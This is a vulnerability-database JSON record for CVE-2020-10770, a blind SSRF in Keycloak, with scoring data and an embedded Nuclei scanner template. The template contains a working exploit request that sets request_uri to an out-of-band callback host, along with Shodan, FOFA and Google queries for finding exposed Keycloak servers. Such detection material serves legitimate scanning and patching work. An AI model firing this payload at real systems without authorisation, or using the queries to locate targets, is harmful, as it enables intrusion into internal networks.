{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-10770/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-10770/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-10770/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-10770/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-10770/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-10770"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-10770"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.69724,
      "kev": false,
      "percentile": 0.99338
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-10770.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2020-10770\n\ninfo:\n  name: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)\n  author: dhiyaneshDk\n  severity: medium\n  description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks.\n  remediation: |\n    Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability.\n  reference:\n    - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html\n    - https://www.exploit-db.com/exploits/50405\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-10770\n    - https://bugzilla.redhat.com/show_bug.cgi?id=1846270\n    - https://github.com/soosmile/POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2020-10770\n    cwe-id: CWE-918\n    epss-score: 0.69724\n    epss-percentile: 0.99338\n    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: redhat\n    product: keycloak\n    shodan-query:\n      - http.html:\"keycloak\"\n      - http.title:\"keycloak\"\n      - http.favicon.hash:-1105083093\n    fofa-query:\n      - title=\"keycloak\"\n      - icon_hash=-1105083093\n      - body=\"keycloak\"\n    google-query: intitle:\"keycloak\"\n  tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/'\n\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 4a0a00473045022100ef64cea587c38bd5492c3b124a7bf09ede00bd8df582e5cd504f2ba7f6ed45a1022053b94475be9a5fb3ce720da29572463b4d8f0dfe508c65990de4bb1d3da6674f:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-10770"
}